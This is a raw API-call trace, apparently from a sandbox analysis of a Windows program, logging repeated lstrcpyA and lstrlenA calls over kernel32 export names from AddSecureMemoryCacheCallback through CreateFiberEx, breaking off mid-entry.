lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.451] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.451] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.451] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.451] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.451] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.451] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.451] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.451] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.451] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.451] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.451] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.451] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.452] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.452] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.452] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.452] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.452] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.452] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.452] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.452] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.452] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.452] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.452] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.452] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.452] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.452] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.452] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.452] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.452] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.452] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.452] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.452] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.452] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.452] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.452] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.452] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.452] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.452] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.452] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.452] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.452] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.452] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.452] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.452] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.452] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.452] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.452] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.453] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.453] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.453] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.453] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.453] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.453] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.453] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.453] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.453] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.453] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.453] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.453] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.453] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.453] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.453] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.453] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.453] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.453] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.453] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.453] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.453] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.453] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.453] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.453] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.453] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.453] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.453] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.453] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.453] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.453] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.453] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.453] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.453] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.453] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.453] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.453] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.453] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.454] lstrlenA (lpString="BEEP") returned 4 [0084.454] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.454] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.454] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.454] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.454] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.454] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.454] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.454] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.454] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.454] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.454] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.454] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.454] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.454] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.454] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.454] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.454] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.454] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.454] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.454] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.454] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.454] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.454] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.454] lstrlenA (lpString="CANCELIO") returned 8 [0084.454] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.454] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.454] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.454] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.454] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.454] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.454] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.455] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.455] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.455] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.455] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.455] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.455] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.455] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.455] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.455] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.455] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.455] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.455] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.455] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.455] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.455] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.455] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.455] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.455] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.455] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.455] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.455] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.455] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.455] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.455] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.455] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.455] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.455] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.455] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.455] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.455] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.455] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.455] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.455] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.455] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.455] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.456] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.456] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.456] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.456] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.456] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.456] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.456] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.456] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.456] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.456] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.456] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.456] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.456] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.456] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.456] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.456] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.456] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.457] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.457] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.457] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.457] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.457] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.457] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.457] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.457] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.457] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.457] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.457] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.457] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.457] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.457] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.457] lstrlenA (lpString="COPYFILEA") returned 9 [0084.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.462] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.462] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.462] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.462] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.462] lstrlenA (lpString="COPYFILEW") returned 9 [0084.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.462] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.462] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.462] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.462] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.462] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.462] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.462] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.463] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.463] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.463] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.463] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.463] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.463] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.463] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.463] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.463] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.463] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.463] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.463] 